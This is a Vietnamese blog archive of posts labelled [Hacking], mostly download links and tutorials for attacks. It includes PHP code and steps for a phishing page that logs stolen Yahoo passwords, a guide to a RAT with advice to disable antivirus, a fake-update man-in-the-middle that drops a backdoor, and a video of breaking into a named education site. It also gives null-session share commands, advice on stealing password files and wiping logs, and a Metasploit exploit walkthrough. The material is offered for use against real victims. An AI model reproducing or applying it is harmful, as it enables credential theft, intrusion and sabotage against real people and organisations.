Trao đổi với tôi

http://www.buidao.com
Showing posts with label [Hacking]. Show all posts
Showing posts with label [Hacking]. Show all posts

1/5/11

[Hacking] Chôm Pass Yahoo! và POP3


Bạn vui lòng xem bài viết "Chôm Password trong môi trường Switch" trước khi xem bài này http://nhatnghe.com/forum/showthread.php?t=1842
Mô hình Mạng:

Hình ảnh này đã được thay đổi kích thước. Click vào đây để xem hình ảnh gốc với kích thước là 827x362


Click vào đây để xem phim minh họa dùng Cain để sniffer Password của Yahoo mail và POP3 mail.
RefLink: http://www.nhatnghe.com/forum/showthread.php?t=2257

12/9/10

[Hacking] Hiding Shellcode in Plain Sight



download link = http://www.mediafire.com/?d4pk15u24aou4a0
pass = e-omidfar.blogspot.com

[Hacking] Shellcoding for linux & windows

Shellcoding for linux & windows




Linux Shellcoding - Example 1 - Making a Quick Exit - Example 2 - Saying Hello - Example 3 - Spawning a Shell Windows Shellcoding - Example 1 - Sleep is for the Weak - Example 2 - A Message to say "Hey" - Example 3 - Adding an Administrative Account Advanced Shellcoding Methods - Printable Shellcode Conclusion Further Reading/Attributions

download link = http://www.mediafire.com/?axfe98sk9vya9sk
pass = e-omidfar.blogspot.com

11/28/10

[Hacking] Báo cáo An toàn mạng, Tìm hiểu về Tấn công SQL Injection, Demo Video

Highslide JS


[Đề tài] Báo cáo An toàn mạng, Tìm hiểu về Tấn công SQL Injection, Demo Video



Video hack:
Tệp tin tải về
Bấm vào đây tải về

Password: www.vnitblog.com or www.vnghiit.com


File PPT Báo cáo SQL Injection:
Tệp tin tải về
Bấm vào đây tải về

Password: www.vnitblog.com or www.vnghiit.com


Ebook tiếng anh về Injection:
http://www.4shared.com/document/xA9PGLBx/Ebook_SQL_Injection___www_vngh.html

11/5/10

[Hacking] How to hack twitter password

How to hack twitter password
Download:
http://fileserve.com/file/hVMwvWn


11/4/10

[Hacking] TUT đoạt quyền Tayninh.edu.vn (Sở Giáo Dục Tây Ninh)

TUT by Z-Crew cua Vietmatrix

Vẫn như mọi Post : " Chào anh chị em ! ". :D
Sẵn yêu cầu của chị Mộ Bang nên em làm muôn cái TUT,anh chị em xem chơi cho vui ngày vui tháng !

+ Site :
http://tayninh.edu.vn
+ Về phương thức tấn công thì trong forum cũng đã từng đề cập.
+ Video dài khoảng 12 phút.Mong mọi người xem và cho ý kiến ;)

_Link :
http://www.mediafire.com/?mzy4xtz5zyh

Chúc mọi người vui vẻ và sức khỏe tràn đầy.
Zero.yt !

Sưu tầm:

http://vn.360plus.yahoo.com/letrungdung_tnn/article?mid=386&prev=390&next=383

[Hacking] Hướng dẫn tạo trang redirect theo tình huống

Hướng dẫn tạo trang redirect theo tình huống

Thấy hay leech về cho mấy bạn chưa biết, cái này của anh PETER

Download:
http://www.mediafire.com/?v4c8bjuacbp272t

10/29/10

[Hacking] Khai thác lỗ hổng MS10-061 sử dụng metasploit

Theo BKAV:

MS10-061, 1 trong 4 lỗ hổng mà sâu Stuxnet sử dụng, nằm ở dịch vụ chia sẻ máy in trên Windows. Bằng cách gửi một lệnh in qua RPC (Remote Procedure Call – Thủ tục gọi hàm từ xa), kẻ xấu có thể thực thi từ xa mã lệnh tùy ý trên hệ thống có chia sẻ máy in.
Download:

http://hotfile.com/dl/78231484/7457bed/spool.rar.html

[Hacking] Fake update using metasploit and other tools

Đây là một kĩ thuật rất hay mà mình đã học được từ một bro nước ngoài. cũng từ khoảng tháng năm 2010. Thấy khá hay và áp dụng mở rộng. Nếu ai đã từng xem hoặc sử dụng rồi thì có thể tham gia thảo luận mở rộng. Còn ai chưa thì xem tham khảo.

Thực chất của nó là sử dụng một đoạn script viết sẵn để tự động Manning in the Middle. Tạo ra một trang lừa người dùng update bằng cảnh báo bảo mật. Không cho nạn nhân truy cập website khác ngoài trang fake mà kẻ tấn công tạo ra. ( Hôm trước làm video này, làm trong lab mà toàn bộ mạng công ty cũng dính . Không thể truy cập được website khác trong khi yahoo vẫn chat bình thường. Sếp ra hỏi có ai vào internet được không. Tất cả đều nói chỉ vào đựoc trang update ).

Sau khi nạn nhân dowload file update về và chạy, sẽ tạo ra một connect giống như netcat. Đó là SBD (Viết tắt của Secure BackDoor) và upload VNC lên. Như vậy thì còn gì bằng :">

Download:
Code:
http://hotfile.com/dl/73184292/a2578d5/fake.rar.html
Đồ Nghề :
Code:
http://www.mediafire.com/?1lazwo7k8q3t5
P/S: cái này mà ra quán cafe nơi mà có 1 em xinh xinh đang lướt web :">

10/15/10

[Hacking] 3 Video hack modem sử dụng netcat link mediafire


Highslide JS



[Hacking] 3 Video hack modem sử dụng netcat link mediafire



P1:
Tệp tin tải về
Bấm vào đây tải về

Password: www.vnitblog.com or www.vnghiit.com


P2:
Tệp tin tải về
Bấm vào đây tải về

Password: www.vnitblog.com or www.vnghiit.com


P3:
Tệp tin tải về
Bấm vào đây tải về

Password: www.vnitblog.com or www.vnghiit.com

[Hacking] An Toàn Mạng Tìm hiểu DDOS Attack link mediafire.com

"DoS" redirects here. For other uses, see DOS (disambiguation).
DDoS Stacheldraht Attack diagram.

Highslide JS


A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. The term is generally used with regards to computer networks, but is not limited to this field, for example, it is also used in reference to CPU resource management.[1] There are two general forms of DoS attacks: those that crash services and those that flood services.[2]

One common method of attack involves saturating the target machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly as to be rendered effectively unavailable. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

Denial-of-service attacks are considered violations of the IAB's Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.[3]
Tệp tin tải về
Bấm vào đây tải về

Password: www.vnitblog.com or www.vnghiit.com

7/7/10

[Hacking] Shellcode Tutorials

The following are tutorials on how to write shellcode for beginners through to advanced. These tutorials are continually being expanded so make sure to check back to stay up to date with the latest tutorials.

Shellcode Tutorial 1: Introduction and Tools Setup
Gives an intro into shellcode and steps you through setting up your environment.

Shellcode Tutorial 2: My First Simple Shellcode
Steps you through creating and testing very simple shellcode.

Shellcode Tutorial 3: Windows Command Execution Shellcode
Define and locate a string constant, and use it to create a new administrative Windows user.

Shellcode Tutorial 4: Message Box Shellcode
Teaches you how to load libraries, call simple functions, and execute them.

Shellcode Tutorial 5: Function Hash Generation
Defining and using constants, more complex functions, generating function hashes, and an introduction to OllyDbg!

Shellcode Tutorial 6: Dynamic Shellcode
Dynamically locate Kernel32 and function addresses. No more hardcoded addreses!

Shellcode Tutorial 7: Introduction to Sockets - Portbind Shellcode
Dynamic shellcode that loads ws2_32.dll and creates a listening port that provides a command shell to remote users.

Shellcode Tutorial 8: Introduction to Networking - Connectback Shellcode
Dynamic shellcode that initializes a connection back to the attacker and connects them to a command shell on the compromised system.

Shellcode Tutorial 9: Generating Shellcode Using Metasploit
Use the Metasploit Exploit Framework web interface and msfpayload command to generate various shellcode for different platforms in a range of formats.

reflink: http://projectshellcode.com/?q=node/12

7/6/10

[Hacking] Hướng dẫn sử dụng Spynet 2.7 RAT Final từ A->Z.

Hix chào mọi người tham gia HCE từ khá lâu roài nhưng chưa đóng góp được gì nay đang thất tình ngồi buồn quay cái video hướng dẫn sử dụng Spynet Rat version 2.7 Final. Thứ nhất quay là để nấy tinh thần quên đi quá khứ trong thời gian qua thứ hai là để đóng góp, mong mọi người ủng hộ shu. Nếu ai không xem thì đừng nói lời cay đắng.
Khi quay hướng dẫn shu sẽ không viết mà sẽ nói do vậy khi xem thì máy tính phải có loa đấy nha. Do đang buồn tình và cũng là lần đầu tiên hướng dẫn bằng cách nói lên nhiều lúc nói vấp và nhầm mọi người xem thông cảm.^^


Bản này shu cũng đã dịch ra tiếng việt đến 99%. trình độ dịch có thể không pro nhưng cũng không đến lỗi tệ lắm đâu nếu có chỗ nào sai sót mong mọi người góp ý.
Cái này shu hướng dẫn khá kỹ lưỡng roài nếu ai xem mà không làm được thì shu cũng bó tay luôn.
Bản này mình lấy nguyên của forum hacking nước ngoài tuyết đối shu không chèn bất kỳ cái gì vào. Nếu ai dùng kêu ca thế này thế nọ thì đừng dùng vì cái này là hàng nước ngoài. Nếu ai phát hiện cái gì mà bảo shu chèn vao thì phắn ra khỏi topic này.


Note: Khi dùng tắt Antivirus đi không nó băm cho tời bời đấy
.
Dowload:

Ah. shu có cả source bản spynet 2.7 beta nếu ai cần thì để lại mail shu gửi Source cho.


Cuối cùng ai Dowload thì thanks hộ shu một cái lấy tinh thần giảm bớt lỗi buồn nào.

2h30 roài => Buồn ngủ mà ko ngủ đươc. Ôi tình yêu, thui cố ngủ. hu hu

reflink: http://hcegroup.net/hceteam/showthread.php?t=1126

7/2/10

[Hacking] Flood PRO tràn ngập dữ liệu victim [VB#]


Highslide JS



- Flood hiểu nôm na có nghĩa là tràn ngập - Khi bạn thiết kế một FORM để nhập dữ liệu, thì bất kỳ ai cũng áo thể view sources để xem cấu trúc HTML của FORM bạn thiết kế, vì vậy nếu site bạn không chống flood, hackers có thể dễ dàng flood site bạn, làm DB của bạn có thể bị tràn ngập và xuất hiện nhiều dữ liệu dư thừa.

- Flood Member, Flood Shoutbox, Flood Comment,.....--> Flood tổng hợp. (Flood những jì có thể Flood được).
- Có kèm video sử dụng ở dưới cùng (có kèm mật khẩu unrar)
- Yêu cầu: .NET Framework 2.0 hoặc 3.1

- Tool Flood PRO v1.1
Tệp tin tải về
Bấm vào đây tải về

Password: www.vnitblog.com or www.vnghiit.com

--------------------------------------------------


- Tool Flood PRO v1.2
Tệp tin tải về
Bấm vào đây tải về

Password: www.vnitblog.com or www.vnghiit.com

--------------------------------------------------


- Video sử dụng:
Mật khẩu unrar nếu cần: phstiger
Tệp tin tải về
Bấm vào đây tải về

Password: www.vnitblog.com or www.vnghiit.com

6/13/10

[Hacking] Hướng dẫn làm trang yahoo giả mạo lừa lấy mật khẩu

- Hôm vừa rồi có ghé thăm web trường thấy có bị dính bug XSS nhìu wa' ... thức khuya coi trận tứ kết Cúp C1 2010 MU-Bayer ko bi'k làm chi rãnh mu'c cái bug XSS fa' chơi (mai mang con lap về mình sẽ làm cái video cho các bạn xem nhé, giờ máy PC nặng quá chạy k nổi)

- Nhân tiện đây mình cũng xin hướng dẫn các bạn cách làm trang đăng nhập yahoo,gmail... giả mạo để lừa lấy mật khẩu ...

- Còn làm sao để người ta đăng nhập bằng trang yahoo mạo đó thì do bạn: lợi dụng bug xss, hay gởi link đến nạn nhân dụ dỗ, hay email ... tùy ứng của bạn

- Yêu cầu của mình là khi bạn đọc hướng dẫn bạn làm theo và bạn phải hiểu vấn đề vì sao phải làm thế này thế kia :)

- Cái này thì cũ ri'c từ thời Hùng Vương đến giờ rùi, nhưng đôi lúc vẫn cần va't ra sử dụng đó ... Đồ cũ mà lại hiếm và hay nhìu người ko để ý.

1/ Đầu tiên mở notepad gõ vào nội dung sau:
$now = date("H:i:s Y-m-d");
$ten = $_POST['login'];
$matkhau = $_POST['passwd'];
$f=fopen("yahoo_.txt","a");
fwrite($f," $now ---- User: $ten ---- Pass: $matkhau ----\n");
fclose($f);
?>
<><>
<>location.href="http://mail.yahoo.com"< / script >
< /body>< / html>


Lưu lại với tên yahoo.php

2/ Tạo thêm 1 file y.txt với nội dung trống rỗng nữa
3/ Vào trang mail.yahoo.com save as toàn bộ trang web lại
- Mở file htm lên bằng wordpad hoặc bằng trình soạn thảo nào đó như Notepad, Notepad++,EditPlus...
Tìm dòng:
< method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return hash2(this)">

Và thay thế vào đó
< form name="login_form" action="y.php" method="post">


4/ Bây giờ bạn chỉ cần up lên host (host hỗ trợ php). Và CHMOD file y.txt là 777
5/ Xong...

+++ Ngoài ra các bạn có thể giả mạo form đăng nhập bất kì site nào bằng cách tương tự như trên

- Code làm sẵn fake đăng nhập yahoo:
http://www.mediafire.com/?mm2wtzicikq

- Code làm sẵn fake đăng nhập gmail:
http://www.mediafire.com/?wtz1umiiyyk

- Code làm sẵn fake đăng nhập paygate.vtc.vn:
http://www.mediafire.com/?nwwegjzqzjh

reflink: http://vn.360plus.yahoo.com/romeo_nhonguoi_2012/article?mid=61

6/12/10

[Hacking] Những bước hacker hay attacker làm với server

FootPrinting : Các mục tiêu của bước này chủ yếu là những thông tin ban đầu về server .

Công nghệ bạn cần sử dụng là : Open source search ( nguồn máy chủ tìm kiếm ) Whois , Web interface to whois , Arin Whois , DNS zone transfer ( bộ phận này chủ yếu là kiểm tra về người chủ server , DNS .. cấu trúc server chưa thể hiện rõ ở đây ) 1 số công cụ : UseNet , search engines ( công cụ tìm kiếm ) , Edgar Any Unix client , http://www.networksolutions.com/whois , http://www.arin.net/whois , dig , nslookup Is -d , Sam spade


Scanning : Phần lớn các server chịu bung thông tin quan trọng trong bước này , hãy cố gắng tận dụng bước này triệt để để biết các port trên server , nghe đường dữ liệu .

Công nghệ bạn cần sử dụng là : Ping Sweep , TCP/UDP port Scan , Os Detection . Các công cụ : fping , icmpenum Ws_ping ProPack , nmap , SuperScan , fscan nmap , queso , siphon .


Enumeration : Đến bước này , các attacker bắt đầu kiểm soát server sơ bộ , xác định các account trên server , mức độ bảo vệ …

Công nghệ bạn cần sử dụng là : List user accounts , List file share , Identify applications . Các tool phụ trợ : null sessions , DumpACL , sid2user , OnSite Admin showmount , NAT , Legion banner grabbing với telnet , netcat , rpcinfo .


Gaining access : Aha , đã có đủ dữ liệu để kết hợp tất cả chúng lại . Chúng ta bắt đầu đến gần mục tiêu . Hãy nắm chắc cơ hội . 1 account có thể bị Crack .

Công nghệ : Password eavesdropping , File Share brute forcing , Password file grab , buffer overflows . Các tool : tcpdump , L0phtcrack readsmb , NAT , legion , tftp , pwdump2 ( NT ) ttdb , bind , IIS , .HTR/ISM.DLL


Escalating privilege : Nếu 1 account không may mắn nào ở một cấp độ nào đó bị crack ở bước trên , chúng ta sẽ có cái tận dụng để điều khiển Server .

Công nghệ : Password cracking , BUG ,Exploits . Tools : john , L0phtcrack , Ic_messages , getadmin , sechole .


Pilfering : Thông tin lấy từ bước trên đủ để ta định vị server và điều khiển server . Nếu bước này không thành công , hãy đến bước .

Công nghệ : Evaluate trusts , Search for cleartext passwords . Tool : rhost , LSA Secrets user data , configuration files , Registry .


Covering Tracks : Hệ thộng luôn ghi nhận những hành động của bạn . Nếu bây giờ mà kết thúc , chắc bạn bị tóm ngay . Đây là bước cực kì quan trọng . XÓA LOG .

Công nghệ : Clear logs , hide tools . Tools : Zap , Event log GUI , rootkits , file streaming .


Creating Backdoors : Còn phải hỏi , bạn phải để lại 1 cái cổng sau , lần sau có vào thì dễ hơn chứ . Nếu không thành công , quay lại bước xem lại các quyền của user bạn sử dụng .

Công nghệ : Creat rogue user accounts , schedule batch jobs , infect startup files , plant remote control services , install monitoring mechanisms , replace apps with Trojan . Tools : members of wheel , administrators cron, At rc , Startup folder , registry keys , netcat , remote.exe , VNC , BO2K , keystroke loggers, add acct to secadmin mail aliases login , fpnwclnt.dll


Denial of Servies : 1 attacker không thành công với những gì anh ta đã làm … họ sẽ tận dụng những exploits code để làm cho server ngừng hoạt động luôn , gọi đó là : tấn công từ chối dịch vụ .

Công nghệ : SYN flood , ICMP techniques , Identical src/dst SYN requests , Overlapping fragment/offset bugs , Out of bounds TCP options ( OOB ) DDoS . Tools phụ trợ : synk4 , ping of death , smurf land , latierra , teardrop , bonk , newtear , supernuke.exe , trinoo/TFN/stacheldraht

Thế đó , những bước hacker hay attacker làm với server khi họ muốn attack . Không đơn giản chút nào nhỉ ?
Những tool trên , bạn có thể search ở các máy tìm kiếm như www.google.com , www.av.com … với từ khoá là tên tôi đã cho .

reflink: http://roseandgun.wordpress.com/2008/04/07/nh%E1%BB%AFng-b%C6%B0%E1%BB%9Bc-hacker-hay-attacker-lam-v%E1%BB%9Bi-server/

[Hacking] Xâm nhập vào máy tính của Victim đang Online bằng chương trình Essential NetTools

- Đầu tiên các bạn phải Download chương trình Essential NetTools :
Essential Net Tools 3.0 Crack của nó
Rồi thực hiện các bước sau :
+ Giải nén files Essential Net Tools 3.0.zip bằng các công cụ giải nén như :
Winzip, Winrar…
Download tại : http://www.winzip.com/

Bước 1 : Thiết lập cấu hình
- Bạn vào trong Control Panel rồi vào Network
- Click vào nút Add rồi chọn phần Client
- Tiếp tục nhấn nút Add. Rồi chọn phần Microsoft
- Chọn phần Client for Microsoft Network
- Cuối cùng là OK
Bước 2 : Bắt đầu xâm nhập
+ Ngay phần NBscan
ngay phần” Starting IP”:
Đánh vào IP của bạn. Để biết số IP của bạn thì vào Start –> Run rồi gõ : “winipcfg”
VD :
203.162.11.1
hoặc :
202.167.122.1
Còn phần Ending Ip :
203.162.11.255
hoặc :
202.167.122.225
+ Sau đó click chuột vào nút
Start
+ Chờ sau giây lát !
Nó sẽ xuất hiện danh sách IP sau khi dò tìm !
+Ngay phần RS:
No : là không có xâm nhập vào được
Yes: là xâm nhập được (nhưng đôi khi thì không)
+ Nhấp chuột phải vào hàng mà có chữ “Yes”
- Nhấp vào phần “Open Computer”
+ Và sau đó các bạn có thể xâm nhập vào máy của victim được nhưng cũng có thể có mấy cái máy không xâm nhập vào được !

Nhưng đột nhập để làm gì ?
Chúng ta đột nhập để ăn cắp Acount và dữ liệu của victim !
Ắn cắp Password bằng cách lấy files PWL của victim trong :
C:/window/*.PWL
Rồi dùng công cụ PWL Tool để đọc được file đó

reflink: http://roseandgun.wordpress.com/2008/04/18/xam-nh%E1%BA%ADp-vao-may-tinh-c%E1%BB%A7a-victim-dang-online-b%E1%BA%B1ng-ch%C6%B0%C6%A1ng-trinh-essential-nettools/

6/11/10

[Hacking] Các bước cơ bản để đột nhập trong LAN

Giới thiệu sơ lược cho các bạn một vài cách thức cơ bản để kiểm tra và tìm cách đột nhập vào 1 máy tính trong LAN.

1- Kiểm tra IPC share: IPC viết tắt của Inter-Process Communication, được dùng trong việc chia sẻ dữ liệu giữa các ứng dụng và máy tính trên mạng (NT/2K). Khi một máy được khởi động và log vào mạng, hdh sẽ tạo 1 chia sẻ ngầm định tên là IPC$. Nó sẽ giúp cho các máy khác có thể nhìn thấy và kết nối đến các chia sẻ trên máy này. Tuy nhiên, có thể vì một lý do gì đó, người dùng xóa mất IPC$ share, do đó, ta cần kiểm tra và tạo lại kết nối đến IPC$ (gọi là null connection), nếu kết nối thành công, ta có thể thấy được cả các chia xẻ đặc biệt được ẩn (bao gồm C$, ADMIN$, IPC$, IPC$). Cụ thể, dùng 1 trong 3 lệnh sau ở command prompt:
C:\>NET USE \\TARGET\IPC$ “” /USER:”"
C:\>NET USE \\TARGET\IPC$ * /USER:
C:\>NET USE \\TARGET\IPC$ * /USER:”"

trong đó: target là computername hoặc IP của máy bạn muốn kết nối.
Lưu ý, các chia xẻ có dấu $ phía sau tên chỉ ra rằng chia xẻ đó được ẩn và cách này chỉ áp dụng khi cổng NetBios 139 của máy bạn và máy đích được mở.
Thường là đối với chia xẻ dạng này, bạn sẽ ít có cơ hội khai thác được gì. Tuy nhiên, nếu may mắn, bạn vẫn có thể khai thác được trong trường hợp các chia xẻ đó không yêu cầu mật khẩu.

Kế đến, bạn dùng lệnh sau để xem các chia xẻ thấy được:
C:\>net view \\TARGET
Lệnh net view sẽ liệt kê danh sách các share của máy đích. Bạn dùng net view /? để biết thêm các cách dùng khác.
Sau khi tạo được null connection và biết được các share trên máy đối phương. Ðối với các share được bảo vệ bằng username/password, bạn có thể dùng các tool sau để thử crack chúng: Nat (NetBIOS Auditing Tool)…
Ðể tiết kiệm thời gian, bạn tìm và dùng thử chương trình xSharez scanner, cũng có thể cho bạn kết quả tương tự.

2- Kiểm tra các cổng mở
Một cách khác để connect vào một máy là duyệt các port mở của máy đích. Tuỳ loại port mà ta có cách thức khai thác khác nhau, đơn giản nhất là dùng telnet để connect vào máy thông qua port được mở, ví dụ: C:\telnet anhnguyen 69
Một số port thông dụng:
21: FTP
23: Telnet proxy server
25: SMTP
110: POP3
139: NETBIOS
1080: SOCKS proxy
6667: IRC mapping
…..
Các công cụ để scan port có rất nhiều, ví dụ như: superscan, elite, ….
Sau khi scan được port nào đang opened, nếu port đó ngoài những port trên, bạn thử dùng telnet để connect, nếu thành công, bạn có thể vào command prompt shell của máy đó.

3- Kiểm tra các lổ hổng của OS/Software
Cách cuối cùng tớ nói ở đây, cũng là cách khó nhất là duyệt xem máy đó đang dùng OS gì, server gì, software nào. Mỗi loại trên có các hole/vulnerability riêng, được tìm thấy và mô tả chi tiết trong các site về security như ntbugtraq, securityfocus, hoặc trong forum.
Từ những lổ hổng biết được, ta sử dụng các exploit tương ứng để thâm nhập vào máy.
Lỗi sơ đẳng nhất trong các system software là lỗi về cách đặt password, ví dụ như các máy Wins 9x có thể vào mà không cần password (tất nhiên là khi đó, người log vào sẽ bị hạn chế truy cập các tài nguyên mạng); hoặc như với NT/2K, sau khi setup, password ngầm định của adminnistrator là rỗng, nếu user không thay đổi pass cho admin, thì ta có thể connect remote được dưới username là administrator mà không cần pass.
Các lỗi còn lại thường là do các sai sót trong quá trình viết chương trình mà vô tình tạo nên những lỗ hổng, các đoạn code kiểm tra không đầy đủ, không stable…cho phép người dùng thực thi các lệnh, chạy các chương trình từ xa. Ví dụ như bug Unicode encoding của IIS4… Và cách thường dùng để nhập là tìm cách send 1 trojant/backdoor (điển hình như Netcat…)đến máy đó, chạy backdoor đó để mở 1 port nhất định nào đó, rồi ta sẽ connect remote vào port đó.

Trên đây chỉ là một số phương pháp sơ đẳng để giúp các bạn (newbie) hiểu được các cách thức có thể dùng để thâm nhập vào máy từ xa. Còn rất nhiều phương pháp khác mà tớ không liệt kê hết (vì không biết! hehe), các bạn sẽ từ từ tìm hiểm thêm.

reflink: http://roseandgun.wordpress.com/2008/04/18/cac-b%C6%B0%E1%BB%9Bc-c%C6%A1-b%E1%BA%A3n-d%E1%BB%83-d%E1%BB%99t-nh%E1%BA%ADp-trong-lan/

[Hacking] Sử dụng Metasploit Framework

Xem xét toàn cảnh

Như chúng ta đã biết, muốn khai thác hệ thống để phá hoại cần phải đáp ứng được một số tiêu chuẩn nhất định. Bạn có thể gọi nó là hàng loạt vấn đề cũng được. Liệu dịch vụ có lỗ hổng hay không, liệu nó có bộc lộ ở web hay không, và liệu…. Bạn sẽ phải vẽ ra một bức tranh cụ thể cho mình. Những hoạt động thực tiễn chúng ta sẽ làm với tất cả các bước cần thiết để xâm nhập một web server, sau đó upload phiên bản index.html riêng lên server. Chúng ta sẽ phải lên danh sách các hoạt động cần phải làm tương ứng với hệ điều hành và kiểu web server.

Tôi đã thực hiện cuộc phá hoại minh hoạ này trong phòng làm việc tại nhà với hai laptop. Một máy cài hệ điều hành SuSE Linux, máy còn lại cài Windows 2000 Professional. Trong laptop W2K tôi cài web server nguồn mở Apache phiên bản 1.3.17. Có một số phiên bản nhiều lỗ hổng khác ra đời sau 1.3.17 nhưng chúng ta sẽ dùng phiên bản này làm ví dụ bởi vì nó có lỗ hổng mã hoá chắc chắn.

Nội dung chi tiết

Tất cả dường như có vẻ ổn, nhưng bạn mới chỉ xác định được vị trí mã nguồn để khai thác? Không chỉ có thể, bạn biết chắc chắn rằng không có các thành phần “giá trị bổ sung” trong mã khai thác hay không? Để đơn giản hoá tôi dùng Metasploit Framework. Framework này được đặt chung với HDM và spoonm. Nó còn là bản miến phí dành cho mọi người. Tính năng nâng cao khi dùng công cụ này là bạn có thể khai thác an toàn tất cả các lỗ hổng kèm theo mà không phải sợ bất kỳ backdoor nào. Framework này có thể dùng trong cả môi trường Linux hoặc win32. Bạn có thể có sự lựa chọn riêng cho mình, còn trong ví dụ này tôi dùng Linux vì server tftp đang chạy trên nó. Server này sẽ được dùng trong các hoạt động minh hoạ thử nghiệm của cả bài.

Các yêu cầu cho hoạt động tấn công một trang web đã nói ở trên gồm:

Metasploit Framework để khởi động quá trình khai thác.
Windows 2000 Professional cài đặt Apache 1.3.17.
Hai laptop kết nối với nhau qua một switch.

Metasploit

Trong phần một chúng ta sẽ xem xét sơ lược về Metasploit. Ở phần hai các bạn sẽ được hướng dẫn chi tiết từng bước cách sử dụng. Chúng tôi sẽ cung cấp một số thông tin giúp bạn có được sự hình dung ban đầu về nó. Trong bài này tôi dùng Metasploit trong Linux.

Dưới đây là toàn bộ thư mục và file tạo một lần trong Framework không bị nén.

don@linux:~/framework-2.2> dir
total 107
drwxr-xr-x 2 500 10000 112 2004-08-07 17:50 data
drwxr-xr-x 2 500 10000 744 2004-08-07 17:50 docs
drwxr-xr-x 2 500 10000 280 2004-08-07 17:50 encoders
drwxr-xr-x 2 500 10000 1288 2004-08-07 17:50 exploits
drwxr-xr-x 2 500 10000 144 2004-08-07 17:50 extras
drwxr-xr-x 6 500 10000 208 2004-08-07 17:50 lib
-rwxr-xr-x 1 500 10000 4687 2004-07-29 23:41 msfcli
-rwxr-xr-x 1 500 10000 22975 2004-07-29 23:41 msfconsole
-rwxr-xr-x 1 500 10000 5744 2004-07-05 06:52 msfdldebug
-rwxr-xr-x 1 500 10000 5639 2004-07-29 23:41 msfencode
-rwxr-xr-x 1 500 10000 1538 2004-08-07 17:58 msflogdump
-rwxr-xr-x 1 500 10000 2104 2004-07-29 23:41 msfpayload
-rwxr-xr-x 1 500 10000 9361 2004-07-27 03:38 msfpayload.cgi
-rwxr-xr-x 1 500 10000 6952 2004-07-29 23:41 msfpescan
-rwxr-xr-x 1 500 10000 12096 2004-08-08 04:37 msfupdate
-rwxr-xr-x 1 500 10000 16116 2004-08-07 18:31 msfweb
drwxr-xr-x 2 500 10000 120 2004-08-07 18:17 nops
drwxr-xr-x 3 500 10000 1664 2004-08-07 17:50 payloads
drwxr-xr-x 3 500 10000 168 2004-08-07 17:50 sdk
drwxr-xr-x 3 500 10000 80 2004-08-07 17:50 src
drwxr-xr-x 2 500 10000 216 2004-06-07 04:21 tools
don@linux:~/framework-2.2>

Còn phần dưới là cách thu hồi Framework và msfconsole cụ thể.

don@linux:~/framework-2.2> ./msfconsole

__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ v2.2 \/ \/ |__|

+ — –=[ msfconsole v2.2 [30 exploits - 33 payloads]
phần 2
Từ lý thuyết đến thực tế

Từ lý thuyết đến thực tế

Chúng ta sẽ tiếp tục với công cụ Metasploit và cách sử dụng nó. Trước hết là tăng mức hệ thống truy cập vào Web server Apache. Khi bạn thấy lớp ngoài đảo ngược, bạn có thể upload file index.html đã được thay đổi. Nó sẽ trở thành trang mặc định được đưa lên server, chẳng hạn như bản dữ liệu log của công ty bạn.

Phần bên dưới cho biết điều gì thu được sau câu lệnh “show exploits” (đưa ra các lỗ hổng) khi bạn nhập nó ở màn hình lệnh prompt msf trong Metasploit. Danh sách các lỗi hổng có thể khai thác được đưa ra:

msf > show exploits

Metasploit Framework Loaded Exploits
====================================

Credits Metasploit Framework Credits

afp_loginext AppleFileServer LoginExt PathName Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec DistCC Daemon Command Execution
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow

Bạn có thể thấy một số lỗ hổng có thể khai thác bên trong framework đã đưa ra. Danh sách trên đã được cắt bớt. Nếu bạn nhập cùng một lệnh như vậy, bạn sẽ có được danh sách đầy đủ. Chúng ta sẽ thử nghiệm với lỗ hổng thứ hai từ trên xuống: apache_chunked_win32.

Bây giờ nhập lệnh để chọn lỗ hổng chúng ta sẽ dùng như sau:

msf > use apache_chunked_win32
msf apache_chunked_win32 >

Như bạn thấy ở trên, màn hình lệnh prompt xuất hiện trở lại, báo lại cho bạn biết lỗ hổng đã được chọn để dùng: apache_chunked_win32. Tiếp theo là lệnh kiểm tra các tuỳ chọn khác nhau gắn kèm với lỗ hổng dưới framework này.

msf apache_chunked_win32 > show options

Exploit Options
===============

Exploit Name Default Description
——– —— ——- ——————
optional SSL Sử dụng SSL
required RHOST Địa chỉ đích
required RPORT 80 Cổng đích

Target: Windows NT/2K Brute Force

msf apache_chunked_win32 >

Màn hình lệnh xuất hiện trở lại với danh sách các tuỳ chọn chúng ta cần điền đầy đủ như địa chỉ IP host từ xa. Chú ý là bạn cũng cần phải nhập địa chỉ IP host cục bộ, ví dụ như địa chỉ các máy tấn công của bạn trong môi trường thử nghiệm. Bạn cần nhập lệnh thiết lập các tuỳ chọn đó như sau:

msf apache_chunked_win32 > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf apache_chunked_win32 >

Chúng ta sẽ xem tuỳ chọn LHOST ở phần sau trong bài này.

Bạn thấy gì từ các tuỳ chọn khai thác lỗ hổng?

